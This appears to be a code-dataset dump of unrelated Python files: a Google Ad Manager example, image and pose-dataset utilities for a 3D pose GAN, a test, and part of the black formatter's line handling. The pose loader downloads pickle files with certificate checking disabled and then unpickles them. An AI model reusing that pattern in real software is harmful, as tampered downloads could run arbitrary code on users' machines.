# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets all creative wrappers.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize appropriate service.
creative_wrapper_service = client.GetService(
'CreativeWrapperService', version='v202202')
# Create a statement to select creative wrappers.
statement = ad_manager.StatementBuilder(version='v202202')
# Retrieve a small amount of creative wrappers at a time, paging
# through until all creative wrappers have been retrieved.
while True:
response = creative_wrapper_service.getCreativeWrappersByStatement(
statement.ToStatement())
if 'results' in response and len(response['results']):
for creative_wrapper in response['results']:
# Print out some information for each creative wrapper.
print('Creative wrapper with ID "%d" and label id "%d" was found.\n' %
(creative_wrapper['id'], creative_wrapper['labelId']))
statement.offset += statement.limit
else:
break
print('\nNumber of results found: %s' % response['totalResultSetSize'])
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
| 36.288462 | 78 | 0.737149 |
8de23f619193a3e2843cafe9fd7c761ffb9c688b | 1,311 | py | Python | datasets/invert.py | tson1997/Line-Segmentation-Model | f00b65c7914f44fa31e14d41120903d0da2d5496 | ["MIT"] | 1 | 2021-06-19T17:32:14.000Z | 2021-06-19T17:32:14.000Z | datasets/invert.py | tson1997/Line-Segmentation-Model | f00b65c7914f44fa31e14d41120903d0da2d5496 | ["MIT"] | 7 | 2021-06-29T04:08:01.000Z | 2021-07-22T09:12:55.000Z | datasets/invert.py | personwhofloat/Line-Segmentation-Model | f00b65c7914f44fa31e14d41120903d0da2d5496 | ["MIT"] | 1 | 2021-06-24T06:51:19.000Z | 2021-06-24T06:51:19.000Z |
from PIL import Image, ImageOps
import torchvision.transforms.functional as F
class Invert(object):
"""Inverts the color channels of an PIL Image
while leaving intact the alpha channel.
"""
def invert(self, img):
r"""Invert the input PIL Image.
Args:
img (PIL Image): Image to be inverted.
Returns:
PIL Image: Inverted image.
"""
if not F._is_pil_image(img):
raise TypeError('img should be PIL Image. Got {}'.format(type(img)))
if img.mode == 'RGBA':
r, g, b, a = img.split()
rgb = Image.merge('RGB', (r, g, b))
inv = ImageOps.invert(rgb)
r, g, b = inv.split()
inv = Image.merge('RGBA', (r, g, b, a))
elif img.mode == 'LA':
l, a = img.split()
l = ImageOps.invert(l)
inv = Image.merge('LA', (l, a))
else:
inv = ImageOps.invert(img)
return inv
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be inverted.
Returns:
PIL Image: Inverted image.
"""
return self.invert(img)
def __repr__(self):
return self.__class__.__name__ + '()'
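# Usage sketch (hypothetical pipeline): Invert only needs __call__, so it
# composes with the standard torchvision transforms.
#
#   import torchvision.transforms as transforms
#   pipeline = transforms.Compose([Invert(), transforms.ToTensor()])
#   # tensor = pipeline(pil_image)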
| 27.3125 | 80 | 0.52479 |
afe1df6d1a1d3179ca725d8e64c4123639d80db3 | 447 | py | Python | fastlane/core/worker/__init__.py | dgkatz/fastlane | 1cfe630651c955434f8019a17be0c4ff1fe42c31 | ["MIT"] | 4 | 2021-12-10T20:30:22.000Z | 2022-01-06T17:08:20.000Z | fastlane/core/worker/__init__.py | dgkatz/fastlane | 1cfe630651c955434f8019a17be0c4ff1fe42c31 | ["MIT"] | null | null | null | fastlane/core/worker/__init__.py | dgkatz/fastlane | 1cfe630651c955434f8019a17be0c4ff1fe42c31 | ["MIT"] | null | null | null |
from fastlane.core.worker import *
from fastlane.core.worker.impl.thread import *
from fastlane.core.worker.impl.process import *
from fastlane.core.worker.impl.batch import *
def get_worker_type(worker_type: str):
if worker_type == 'thread':
return ThreadWorker
elif worker_type == 'process':
return ProcessWorker
elif worker_type == 'batch':
return BatchWorker
    else:
        raise NotImplementedError(f'Unknown worker_type: {worker_type!r}')
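# Usage sketch:
#
#   worker_cls = get_worker_type('thread')    # -> ThreadWorker
#   worker_cls = get_worker_type('process')   # -> ProcessWorker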
| 27.9375 | 47 | 0.709172 |
48bd8ab487a9d49825e67d7e03b7630f86f4f7d8 | 8,910 | py | Python | 3D Pose by GAN/GAN/pose/dataset/pose_dataset.py | kyapp69/OpenMMD | 795d4dd660cf7e537ceb599fdb038c5388b33390 | ["MIT"] | 717 | 2018-10-31T16:52:42.000Z | 2022-03-31T16:13:47.000Z | 3D Pose by GAN/GAN/pose/dataset/pose_dataset.py | Pixis5566/OpenMMD | 795d4dd660cf7e537ceb599fdb038c5388b33390 | ["MIT"] | 48 | 2018-11-08T12:16:43.000Z | 2020-08-10T00:24:50.000Z | 3D Pose by GAN/GAN/pose/dataset/pose_dataset.py | Pixis5566/OpenMMD | 795d4dd660cf7e537ceb599fdb038c5388b33390 | ["MIT"] | 180 | 2018-10-31T18:41:33.000Z | 2022-03-27T23:49:06.000Z |
import copy
import os
import pickle
import chainer
import numpy as np
from . import pose_dataset_base
# Joints in H3.6M -- data has 32 joints,
# but only 17 that move; these are the indices.
H36M_NAMES = [''] * 32
H36M_NAMES[0] = 'Hip'
H36M_NAMES[1] = 'RHip'
H36M_NAMES[2] = 'RKnee'
H36M_NAMES[3] = 'RFoot'
H36M_NAMES[6] = 'LHip'
H36M_NAMES[7] = 'LKnee'
H36M_NAMES[8] = 'LFoot'
H36M_NAMES[12] = 'Spine'
H36M_NAMES[13] = 'Thorax'
H36M_NAMES[14] = 'Neck/Nose'
H36M_NAMES[15] = 'Head'
H36M_NAMES[17] = 'LShoulder'
H36M_NAMES[18] = 'LElbow'
H36M_NAMES[19] = 'LWrist'
H36M_NAMES[25] = 'RShoulder'
H36M_NAMES[26] = 'RElbow'
H36M_NAMES[27] = 'RWrist'
def project_point_radial(P, R, T, f, c, k, p):
"""
Project points from 3d to 2d using camera parameters
including radial and tangential distortion
Args
P: Nx3 points in world coordinates
R: 3x3 Camera rotation matrix
T: 3x1 Camera translation parameters
f: (scalar) Camera focal length
c: 2x1 Camera center
k: 3x1 Camera radial distortion coefficients
p: 2x1 Camera tangential distortion coefficients
Returns
Proj: Nx2 points in pixel space
D: 1xN depth of each point in camera space
radial: 1xN radial distortion per point
tan: 1xN tangential distortion per point
r2: 1xN squared radius of the projected points before distortion
"""
# P is a matrix of 3-dimensional points
assert len(P.shape) == 2
assert P.shape[1] == 3
N = P.shape[0]
X = R.dot(P.T - T) # rotate and translate
XX = X[:2, :] / X[2, :]
r2 = XX[0, :] ** 2 + XX[1, :] ** 2
radial = 1 + np.einsum(
'ij,ij->j', np.tile(k, (1, N)), np.array([r2, r2 ** 2, r2 ** 3]))
tan = p[0] * XX[1, :] + p[1] * XX[0, :]
XXX = XX * np.tile(radial + tan, (2, 1)) + \
np.outer(np.array([p[1], p[0]]).reshape(-1), r2)
Proj = (f * XXX) + c
Proj = Proj.T
    D = X[2, :]
return Proj, D, radial, tan, r2
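# Worked example (hypothetical camera): with an identity rotation, zero
# translation and no distortion, a point on the optical axis projects to the
# principal point c and D is its camera-space depth.
#
#   P = np.array([[0., 0., 5.]])
#   R = np.eye(3); T = np.zeros((3, 1))
#   f = 1000.; c = np.array([[320.], [240.]])
#   k = np.zeros((3, 1)); p = np.zeros((2, 1))
#   Proj, D, radial, tan, r2 = project_point_radial(P, R, T, f, c, k, p)
#   # Proj ~ [[320., 240.]], D ~ [5.], radial ~ [1.], r2 ~ [0.]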
class H36M(pose_dataset_base.PoseDatasetBase):
def __init__(self, action='all', length=1,
train=True, use_sh_detection=False):
if train:
subjects = ['S1', 'S5', 'S6', 'S7', 'S8']
else:
subjects = ['S9', 'S11']
if not os.path.exists('data/h36m'):
os.mkdir('data/h36m')
if not os.path.exists('data/h36m/points_3d.pkl'):
print('Downloading 3D points in Human3.6M dataset.')
os.system('wget --no-check-certificate "https://onedriv' + \
'e.live.com/download?cid=B08D60FE71FF90FD&resid=B08' + \
'D60FE71FF90FD%2118616&authkey=AFIfEB6VYEZnhlE" -O ' + \
'data/h36m/points_3d.pkl')
with open('data/h36m/points_3d.pkl', 'rb') as f:
p3d = pickle.load(f)
if not os.path.exists('data/h36m/cameras.pkl'):
print('Downloading camera parameters.')
os.system('wget --no-check-certificate "https://onedriv' + \
'e.live.com/download?cid=B08D60FE71FF90FD&resid=B08' + \
'D60FE71FF90FD%2118615&authkey=AEUoi3s16rBTFRA" -O ' + \
'data/h36m/cameras.pkl')
with open('data/h36m/cameras.pkl', 'rb') as f:
cams = pickle.load(f)
if use_sh_detection:
if not os.path.exists('data/h36m/sh_detect_2d.pkl'):
print('Downloading detected 2D points by Stacked Hourglass.')
os.system('wget --no-check-certificate "https://onedriv' + \
'e.live.com/download?cid=B08D60FE71FF90FD&resid=B08' + \
'D60FE71FF90FD%2118619&authkey=AMBf6RPcWQgjsh0" -O ' + \
'data/h36m/sh_detect_2d.pkl')
with open('data/h36m/sh_detect_2d.pkl', 'rb') as f:
p2d_sh = pickle.load(f)
with open('data/actions.txt') as f:
actions_all = f.read().split('\n')[:-1]
if action == 'all':
actions = actions_all
elif action in actions_all:
actions = [action]
else:
raise Exception('Invalid action.')
dim_to_use_x = np.where(np.array([x != '' for x in H36M_NAMES]))[0] * 3
dim_to_use_y = dim_to_use_x + 1
dim_to_use_z = dim_to_use_x + 2
dim_to_use = np.array(
[dim_to_use_x, dim_to_use_y, dim_to_use_z]).T.flatten()
self.N = len(dim_to_use_x)
p3d = copy.deepcopy(p3d)
self.data_list = []
for s in subjects:
for action_name in actions:
def search(a):
fs = list(filter(
lambda x: x.split()[0] == a, p3d[s].keys()))
return fs
files = []
files += search(action_name)
# 'Photo' is 'TakingPhoto' in S1
if action_name == 'Photo':
files += search('TakingPhoto')
# 'WalkDog' is 'WalkingDog' in S1
if action_name == 'WalkDog':
files += search('WalkingDog')
for file_name in files:
p3d[s][file_name] = p3d[s][file_name][:, dim_to_use]
L = p3d[s][file_name].shape[0]
for cam_name in cams[s].keys():
if not (cam_name == '54138969' and s == 'S11' \
and action_name == 'Directions'):
# 50Hz -> 10Hz
for start_pos in range(0, L - length + 1, 5):
info = {'subject': s,
'action_name': action_name,
'start_pos': start_pos,
'length': length,
'cam_name': cam_name,
'file_name': file_name}
self.data_list.append(info)
self.p3d = p3d
self.cams = cams
self.train = train
self.use_sh_detection = use_sh_detection
if use_sh_detection:
self.p2d_sh = p2d_sh
def __len__(self):
return len(self.data_list)
def get_example(self, i):
info = self.data_list[i]
subject = info['subject']
start_pos = info['start_pos']
length = info['length']
cam_name = info['cam_name']
file_name = info['file_name']
poses_xyz = self.p3d[subject][file_name][start_pos:start_pos + length]
params = self.cams[subject][cam_name]
if self.use_sh_detection:
if 'TakingPhoto' in file_name:
file_name = file_name.replace('TakingPhoto', 'Photo')
if 'WalkingDog' in file_name:
file_name = file_name.replace('WalkingDog', 'WalkDog')
sh_detect_xy = self.p2d_sh[subject][file_name]
sh_detect_xy = sh_detect_xy[cam_name][start_pos:start_pos+length]
P = poses_xyz.reshape(-1, 3)
X = params['R'].dot(P.T).T
X = X.reshape(-1, self.N * 3) # shape=(length, 3*n_joints)
# Normalization of 3d points.
X, scale = self._normalize_3d(X)
X = X.astype(np.float32)
scale = scale.astype(np.float32)
if self.use_sh_detection:
sh_detect_xy = self._normalize_2d(sh_detect_xy)
sh_detect_xy = sh_detect_xy.astype(np.float32)
return sh_detect_xy, X, scale
else:
proj = project_point_radial(P, **params)[0]
proj = proj.reshape(-1, self.N * 2) # shape=(length, 2*n_joints)
proj = self._normalize_2d(proj)
proj = proj.astype(np.float32)
return proj, X, scale
class MPII(chainer.dataset.DatasetMixin):
def __init__(self, train=True, use_sh_detection=False):
if use_sh_detection:
raise NotImplementedError
else:
self.poses = np.load('data/mpii_poses.npy')
np.random.seed(100)
perm = np.random.permutation(len(self.poses))
if train:
self.poses = self.poses[perm[:int(len(self.poses)*0.9)]]
else:
self.poses = self.poses[perm[int(len(self.poses)*0.9):]]
def __len__(self):
return self.poses.shape[0]
def get_example(self, i):
mpii_poses = self.poses[i:i+1]
xs = mpii_poses.T[0::2] - mpii_poses.T[0]
ys = mpii_poses.T[1::2] - mpii_poses.T[1]
mpii_poses = mpii_poses.T / np.sqrt(xs[1:]**2 + ys[1:]**2).mean(axis=0)
mpii_poses[0::2] -= mpii_poses[0]
mpii_poses[1::2] -= mpii_poses[1]
mpii_poses = mpii_poses.T.astype(np.float32)[None]
dummy_X = np.zeros((1, 1, 17*3), dtype=np.float32)
dummy_X[0, 0, 0::3] = mpii_poses[0, 0, 0::2]
dummy_X[0, 0, 1::3] = mpii_poses[0, 0, 1::2]
dummy_scale = np.array([1], dtype=np.float32)
return mpii_poses, dummy_X, dummy_scale
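# Reading of get_example above (added comment, not original documentation):
# the pose is root-centred (joint 0 moved to the origin) and divided by the
# mean distance of the other joints from the root, making the 2D poses
# translation- and scale-invariant before they are consumed by the model.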
| 36.516393 | 79 | 0.548485 |
7f36f58085598d2f87c4891fd47987e5eee8c4a2 | 1,337 | py | Python | tests/pipeline/test_swab_deltas.py | ONS-SST/cis_households | e475df5929e6763a46cd05aff1f7e960ccbe8e21 | ["MIT"] | null | null | null | tests/pipeline/test_swab_deltas.py | ONS-SST/cis_households | e475df5929e6763a46cd05aff1f7e960ccbe8e21 | ["MIT"] | 252 | 2021-05-19T11:12:43.000Z | 2022-03-02T10:39:10.000Z | tests/pipeline/test_swab_deltas.py | ONS-SST/cis_households | e475df5929e6763a46cd05aff1f7e960ccbe8e21 | ["MIT"] | null | null | null |
import pandas as pd
import pytest
from mimesis.schema import Schema
from cishouseholds.pipeline.input_file_processing import generate_input_processing_function
from cishouseholds.pipeline.input_file_processing import swab_delta_parameters
from dummy_data_generation.schemas import get_swab_data_description
@pytest.fixture
def swab_delta_ETL_output(mimesis_field, pandas_df_to_temporary_csv):
"""
Generate lab swab file as pandas df.
"""
schema = Schema(schema=get_swab_data_description(mimesis_field))
pandas_df = pd.DataFrame(schema.create(iterations=5))
csv_file_path = pandas_df_to_temporary_csv(pandas_df)
processing_function = generate_input_processing_function(**swab_delta_parameters, include_hadoop_read_write=False)
processed_df = processing_function(resource_path=csv_file_path.as_posix())
return processed_df
@pytest.mark.integration
def test_swab_delta_ETL_df(swab_delta_ETL_output, regression_test_df):
regression_test_df(
swab_delta_ETL_output.drop("swab_test_source_file"), "swab_sample_barcode", "processed_swab"
) # remove source file column, as it varies for our temp dummy data
@pytest.mark.integration
def test_swab_delta_ETL_schema(swab_delta_ETL_output, regression_test_df_schema):
regression_test_df_schema(swab_delta_ETL_output, "processed_swab")
| 39.323529 | 118 | 0.827973 |
524bb02b222d7fb9ca2e30667d6905afdd9395ce | 995 | py | Python | Decoder/extractor.py | parttimeEr/3drCode | c4b1a6b69f3769d14fe751da54975b0205e05c73 | ["MIT"] | null | null | null | Decoder/extractor.py | parttimeEr/3drCode | c4b1a6b69f3769d14fe751da54975b0205e05c73 | ["MIT"] | null | null | null | Decoder/extractor.py | parttimeEr/3drCode | c4b1a6b69f3769d14fe751da54975b0205e05c73 | ["MIT"] | null | null | null |
import cv2
def color_remove():
    # Isolate each colour channel of temp.jpg in turn and write an inverted
    # threshold mask for it: 1.jpg (blue), 2.jpg (green), 3.jpg (red).
    # Note that in OpenCV [:, :, 0] is blue, [:, :, 1] is green and
    # [:, :, 2] is red.
    for out_index, keep_channel in enumerate((0, 1, 2), start=1):
        img_array = cv2.imread("temp.jpg")
        for channel in range(3):
            if channel != keep_channel:
                img_array[:, :, channel] = 0
        mask = cv2.inRange(img_array, (0, 0, 0), (200, 200, 200))
        thresholded = cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR)
        inverted = 255 - thresholded
        cv2.imwrite("%d.jpg" % out_index, inverted)
| 35.535714 | 65 | 0.60402 |
555142413cadb5a0286e6d34f69a0780e0f1ba65 | 26,083 | py | Python | src/black/lines.py | sciyoshi/black | faddb504b395c71a92e6a9ffadaafcc9413ecd88 | ["MIT"] | 2 | 2018-12-18T18:14:21.000Z | 2021-12-17T10:58:53.000Z | src/black/lines.py | sciyoshi/black | faddb504b395c71a92e6a9ffadaafcc9413ecd88 | ["MIT"] | null | null | null | src/black/lines.py | sciyoshi/black | faddb504b395c71a92e6a9ffadaafcc9413ecd88 | ["MIT"] | 1 | 2021-06-02T17:46:23.000Z | 2021-06-02T17:46:23.000Z |
from dataclasses import dataclass, field
import itertools
import sys
from typing import (
Callable,
Collection,
Dict,
Iterator,
List,
Optional,
Sequence,
Tuple,
TypeVar,
cast,
)
from blib2to3.pytree import Node, Leaf
from blib2to3.pgen2 import token
from black.brackets import BracketTracker, DOT_PRIORITY
from black.mode import Mode
from black.nodes import STANDALONE_COMMENT, TEST_DESCENDANTS
from black.nodes import BRACKETS, OPENING_BRACKETS, CLOSING_BRACKETS
from black.nodes import syms, whitespace, replace_child, child_towards
from black.nodes import is_multiline_string, is_import, is_type_comment, last_two_except
from black.nodes import is_one_tuple_between
# types
T = TypeVar("T")
Index = int
LeafID = int
@dataclass
class Line:
"""Holds leaves and comments. Can be printed with `str(line)`."""
mode: Mode
depth: int = 0
leaves: List[Leaf] = field(default_factory=list)
# keys ordered like `leaves`
comments: Dict[LeafID, List[Leaf]] = field(default_factory=dict)
bracket_tracker: BracketTracker = field(default_factory=BracketTracker)
inside_brackets: bool = False
should_split_rhs: bool = False
magic_trailing_comma: Optional[Leaf] = None
def append(self, leaf: Leaf, preformatted: bool = False) -> None:
"""Add a new `leaf` to the end of the line.
Unless `preformatted` is True, the `leaf` will receive a new consistent
whitespace prefix and metadata applied by :class:`BracketTracker`.
Trailing commas are maybe removed, unpacked for loop variables are
demoted from being delimiters.
Inline comments are put aside.
"""
has_value = leaf.type in BRACKETS or bool(leaf.value.strip())
if not has_value:
return
if token.COLON == leaf.type and self.is_class_paren_empty:
del self.leaves[-2:]
if self.leaves and not preformatted:
# Note: at this point leaf.prefix should be empty except for
# imports, for which we only preserve newlines.
leaf.prefix += whitespace(
leaf, complex_subscript=self.is_complex_subscript(leaf)
)
if self.inside_brackets or not preformatted:
self.bracket_tracker.mark(leaf)
if self.mode.magic_trailing_comma:
if self.has_magic_trailing_comma(leaf):
self.magic_trailing_comma = leaf
elif self.has_magic_trailing_comma(leaf, ensure_removable=True):
self.remove_trailing_comma()
if not self.append_comment(leaf):
self.leaves.append(leaf)
def append_safe(self, leaf: Leaf, preformatted: bool = False) -> None:
"""Like :func:`append()` but disallow invalid standalone comment structure.
Raises ValueError when any `leaf` is appended after a standalone comment
or when a standalone comment is not the first leaf on the line.
"""
if self.bracket_tracker.depth == 0:
if self.is_comment:
raise ValueError("cannot append to standalone comments")
if self.leaves and leaf.type == STANDALONE_COMMENT:
raise ValueError(
"cannot append standalone comments to a populated line"
)
self.append(leaf, preformatted=preformatted)
@property
def is_comment(self) -> bool:
"""Is this line a standalone comment?"""
return len(self.leaves) == 1 and self.leaves[0].type == STANDALONE_COMMENT
@property
def is_decorator(self) -> bool:
"""Is this line a decorator?"""
return bool(self) and self.leaves[0].type == token.AT
@property
def is_import(self) -> bool:
"""Is this an import line?"""
return bool(self) and is_import(self.leaves[0])
@property
def is_class(self) -> bool:
"""Is this line a class definition?"""
return (
bool(self)
and self.leaves[0].type == token.NAME
and self.leaves[0].value == "class"
)
@property
def is_stub_class(self) -> bool:
"""Is this line a class definition with a body consisting only of "..."?"""
return self.is_class and self.leaves[-3:] == [
Leaf(token.DOT, ".") for _ in range(3)
]
@property
def is_def(self) -> bool:
"""Is this a function definition? (Also returns True for async defs.)"""
try:
first_leaf = self.leaves[0]
except IndexError:
return False
try:
second_leaf: Optional[Leaf] = self.leaves[1]
except IndexError:
second_leaf = None
return (first_leaf.type == token.NAME and first_leaf.value == "def") or (
first_leaf.type == token.ASYNC
and second_leaf is not None
and second_leaf.type == token.NAME
and second_leaf.value == "def"
)
@property
def is_class_paren_empty(self) -> bool:
"""Is this a class with no base classes but using parentheses?
Those are unnecessary and should be removed.
"""
return (
bool(self)
and len(self.leaves) == 4
and self.is_class
and self.leaves[2].type == token.LPAR
and self.leaves[2].value == "("
and self.leaves[3].type == token.RPAR
and self.leaves[3].value == ")"
)
@property
def is_triple_quoted_string(self) -> bool:
"""Is the line a triple quoted string?"""
return (
bool(self)
and self.leaves[0].type == token.STRING
and self.leaves[0].value.startswith(('"""', "'''"))
)
def contains_standalone_comments(self, depth_limit: int = sys.maxsize) -> bool:
"""If so, needs to be split before emitting."""
for leaf in self.leaves:
if leaf.type == STANDALONE_COMMENT and leaf.bracket_depth <= depth_limit:
return True
return False
def contains_uncollapsable_type_comments(self) -> bool:
ignored_ids = set()
try:
last_leaf = self.leaves[-1]
ignored_ids.add(id(last_leaf))
if last_leaf.type == token.COMMA or (
last_leaf.type == token.RPAR and not last_leaf.value
):
                # When trailing commas or optional parens are inserted by Black for
                # consistency, comments after the previous last element are not moved
                # (they don't have to, rendering will still be correct). So we ignore
                # trailing commas and invisible parens.
last_leaf = self.leaves[-2]
ignored_ids.add(id(last_leaf))
except IndexError:
return False
        # A type comment is uncollapsable if it is attached to a leaf
        # that isn't at the end of the line (since that could cause it
        # to get associated to a different argument) or if there are
        # comments before it (since that could cause it to get hidden
        # behind a comment).
comment_seen = False
for leaf_id, comments in self.comments.items():
for comment in comments:
if is_type_comment(comment):
if comment_seen or (
not is_type_comment(comment, " ignore")
and leaf_id not in ignored_ids
):
return True
comment_seen = True
return False
def contains_unsplittable_type_ignore(self) -> bool:
if not self.leaves:
return False
# If a 'type: ignore' is attached to the end of a line, we
# can't split the line, because we can't know which of the
# subexpressions the ignore was meant to apply to.
#
# We only want this to apply to actual physical lines from the
# original source, though: we don't want the presence of a
# 'type: ignore' at the end of a multiline expression to
# justify pushing it all onto one line. Thus we
# (unfortunately) need to check the actual source lines and
# only report an unsplittable 'type: ignore' if this line was
# one line in the original code.
# Grab the first and last line numbers, skipping generated leaves
first_line = next((leaf.lineno for leaf in self.leaves if leaf.lineno != 0), 0)
last_line = next(
(leaf.lineno for leaf in reversed(self.leaves) if leaf.lineno != 0), 0
)
if first_line == last_line:
# We look at the last two leaves since a comma or an
# invisible paren could have been added at the end of the
# line.
for node in self.leaves[-2:]:
for comment in self.comments.get(id(node), []):
if is_type_comment(comment, " ignore"):
return True
return False
def contains_multiline_strings(self) -> bool:
return any(is_multiline_string(leaf) for leaf in self.leaves)
def has_magic_trailing_comma(
self, closing: Leaf, ensure_removable: bool = False
) -> bool:
"""Return True if we have a magic trailing comma, that is when:
- there's a trailing comma here
- it's not a one-tuple
Additionally, if ensure_removable:
- it's not from square bracket indexing
"""
if not (
closing.type in CLOSING_BRACKETS
and self.leaves
and self.leaves[-1].type == token.COMMA
):
return False
if closing.type == token.RBRACE:
return True
if closing.type == token.RSQB:
if not ensure_removable:
return True
comma = self.leaves[-1]
return bool(comma.parent and comma.parent.type == syms.listmaker)
if self.is_import:
return True
if not is_one_tuple_between(closing.opening_bracket, closing, self.leaves):
return True
return False
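    # Illustration (added, not original): in "[1, 2,]" the trailing comma is
    # magic and keeps the collection exploded; in "(1,)" it only marks a
    # one-tuple and is not treated as magic.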
def append_comment(self, comment: Leaf) -> bool:
"""Add an inline or standalone comment to the line."""
if (
comment.type == STANDALONE_COMMENT
and self.bracket_tracker.any_open_brackets()
):
comment.prefix = ""
return False
if comment.type != token.COMMENT:
return False
if not self.leaves:
comment.type = STANDALONE_COMMENT
comment.prefix = ""
return False
last_leaf = self.leaves[-1]
if (
last_leaf.type == token.RPAR
and not last_leaf.value
and last_leaf.parent
and len(list(last_leaf.parent.leaves())) <= 3
and not is_type_comment(comment)
):
# Comments on an optional parens wrapping a single leaf should belong to
# the wrapped node except if it's a type comment. Pinning the comment like
# this avoids unstable formatting caused by comment migration.
if len(self.leaves) < 2:
comment.type = STANDALONE_COMMENT
comment.prefix = ""
return False
last_leaf = self.leaves[-2]
self.comments.setdefault(id(last_leaf), []).append(comment)
return True
def comments_after(self, leaf: Leaf) -> List[Leaf]:
"""Generate comments that should appear directly after `leaf`."""
return self.comments.get(id(leaf), [])
def remove_trailing_comma(self) -> None:
"""Remove the trailing comma and moves the comments attached to it."""
trailing_comma = self.leaves.pop()
trailing_comma_comments = self.comments.pop(id(trailing_comma), [])
self.comments.setdefault(id(self.leaves[-1]), []).extend(
trailing_comma_comments
)
def is_complex_subscript(self, leaf: Leaf) -> bool:
"""Return True iff `leaf` is part of a slice with non-trivial exprs."""
open_lsqb = self.bracket_tracker.get_open_lsqb()
if open_lsqb is None:
return False
subscript_start = open_lsqb.next_sibling
if isinstance(subscript_start, Node):
if subscript_start.type == syms.listmaker:
return False
if subscript_start.type == syms.subscriptlist:
subscript_start = child_towards(subscript_start, leaf)
return subscript_start is not None and any(
n.type in TEST_DESCENDANTS for n in subscript_start.pre_order()
)
def enumerate_with_length(
self, reversed: bool = False
) -> Iterator[Tuple[Index, Leaf, int]]:
"""Return an enumeration of leaves with their length.
Stops prematurely on multiline strings and standalone comments.
"""
op = cast(
Callable[[Sequence[Leaf]], Iterator[Tuple[Index, Leaf]]],
enumerate_reversed if reversed else enumerate,
)
for index, leaf in op(self.leaves):
length = len(leaf.prefix) + len(leaf.value)
if "\n" in leaf.value:
return # Multiline strings, we can't continue.
for comment in self.comments_after(leaf):
length += len(comment.value)
yield index, leaf, length
def clone(self) -> "Line":
return Line(
mode=self.mode,
depth=self.depth,
inside_brackets=self.inside_brackets,
should_split_rhs=self.should_split_rhs,
magic_trailing_comma=self.magic_trailing_comma,
)
def render(self, force_spaces: bool = False) -> str:
"""Render the line."""
if not self:
return "\n"
        # One indent level is four spaces (or one tab), matching the
        # 4 * line.depth length accounting used elsewhere in this module.
        indent_style = "    " if force_spaces or not self.mode.use_tabs else "\t"
indent = indent_style * self.depth
leaves = iter(self.leaves)
first = next(leaves)
res = f"{first.prefix}{indent}{first.value}"
for leaf in leaves:
res += str(leaf)
for comment in itertools.chain.from_iterable(self.comments.values()):
res += str(comment)
return res + "\n"
def __str__(self) -> str:
"""Render the line."""
return self.render()
def __bool__(self) -> bool:
"""Return True if the line has leaves or comments."""
return bool(self.leaves or self.comments)
@dataclass
class EmptyLineTracker:
"""Provides a stateful method that returns the number of potential extra
empty lines needed before and after the currently processed line.
Note: this tracker works on lines that haven't been split yet. It assumes
the prefix of the first leaf consists of optional newlines. Those newlines
are consumed by `maybe_empty_lines()` and included in the computation.
"""
is_pyi: bool = False
previous_line: Optional[Line] = None
previous_after: int = 0
previous_defs: List[int] = field(default_factory=list)
def maybe_empty_lines(self, current_line: Line) -> Tuple[int, int]:
"""Return the number of extra empty lines before and after the `current_line`.
This is for separating `def`, `async def` and `class` with extra empty
lines (two on module-level).
"""
before, after = self._maybe_empty_lines(current_line)
before = (
# Black should not insert empty lines at the beginning
# of the file
0
if self.previous_line is None
else before - self.previous_after
)
self.previous_after = after
self.previous_line = current_line
return before, after
def _maybe_empty_lines(self, current_line: Line) -> Tuple[int, int]:
max_allowed = 1
if current_line.depth == 0:
max_allowed = 1 if self.is_pyi else 2
if current_line.leaves:
# Consume the first leaf's extra newlines.
first_leaf = current_line.leaves[0]
before = first_leaf.prefix.count("\n")
before = min(before, max_allowed)
first_leaf.prefix = ""
else:
before = 0
depth = current_line.depth
while self.previous_defs and self.previous_defs[-1] >= depth:
self.previous_defs.pop()
if self.is_pyi:
before = 0 if depth else 1
else:
before = 1 if depth else 2
if current_line.is_decorator or current_line.is_def or current_line.is_class:
return self._maybe_empty_lines_for_class_or_def(current_line, before)
if (
self.previous_line
and self.previous_line.is_import
and not current_line.is_import
and depth == self.previous_line.depth
):
return (before or 1), 0
if (
self.previous_line
and self.previous_line.is_class
and current_line.is_triple_quoted_string
):
return before, 1
return before, 0
def _maybe_empty_lines_for_class_or_def(
self, current_line: Line, before: int
) -> Tuple[int, int]:
if not current_line.is_decorator:
self.previous_defs.append(current_line.depth)
if self.previous_line is None:
# Don't insert empty lines before the first line in the file.
return 0, 0
if self.previous_line.is_decorator:
if self.is_pyi and current_line.is_stub_class:
# Insert an empty line after a decorated stub class
return 0, 1
return 0, 0
if self.previous_line.depth < current_line.depth and (
self.previous_line.is_class or self.previous_line.is_def
):
return 0, 0
if (
self.previous_line.is_comment
and self.previous_line.depth == current_line.depth
and before == 0
):
return 0, 0
if self.is_pyi:
if self.previous_line.depth > current_line.depth:
newlines = 1
elif current_line.is_class or self.previous_line.is_class:
if current_line.is_stub_class and self.previous_line.is_stub_class:
# No blank line between classes with an empty body
newlines = 0
else:
newlines = 1
elif (
current_line.is_def or current_line.is_decorator
) and not self.previous_line.is_def:
# Blank line between a block of functions (maybe with preceding
# decorators) and a block of non-functions
newlines = 1
else:
newlines = 0
else:
newlines = 2
if current_line.depth and newlines:
newlines -= 1
return newlines, 0
def enumerate_reversed(sequence: Sequence[T]) -> Iterator[Tuple[Index, T]]:
"""Like `reversed(enumerate(sequence))` if that were possible."""
index = len(sequence) - 1
for element in reversed(sequence):
yield (index, element)
index -= 1
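# Quick illustration (added, not original):
#
#   list(enumerate_reversed("abc"))   # -> [(2, 'c'), (1, 'b'), (0, 'a')]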
def append_leaves(
new_line: Line, old_line: Line, leaves: List[Leaf], preformatted: bool = False
) -> None:
"""
Append leaves (taken from @old_line) to @new_line, making sure to fix the
underlying Node structure where appropriate.
All of the leaves in @leaves are duplicated. The duplicates are then
appended to @new_line and used to replace their originals in the underlying
Node structure. Any comments attached to the old leaves are reattached to
the new leaves.
Pre-conditions:
set(@leaves) is a subset of set(@old_line.leaves).
"""
for old_leaf in leaves:
new_leaf = Leaf(old_leaf.type, old_leaf.value)
replace_child(old_leaf, new_leaf)
new_line.append(new_leaf, preformatted=preformatted)
for comment_leaf in old_line.comments_after(old_leaf):
new_line.append(comment_leaf, preformatted=True)
def is_line_short_enough(line: Line, *, line_length: int, line_str: str = "") -> bool:
"""Return True if `line` is no longer than `line_length`.
Uses the provided `line_str` rendering, if any, otherwise computes a new one.
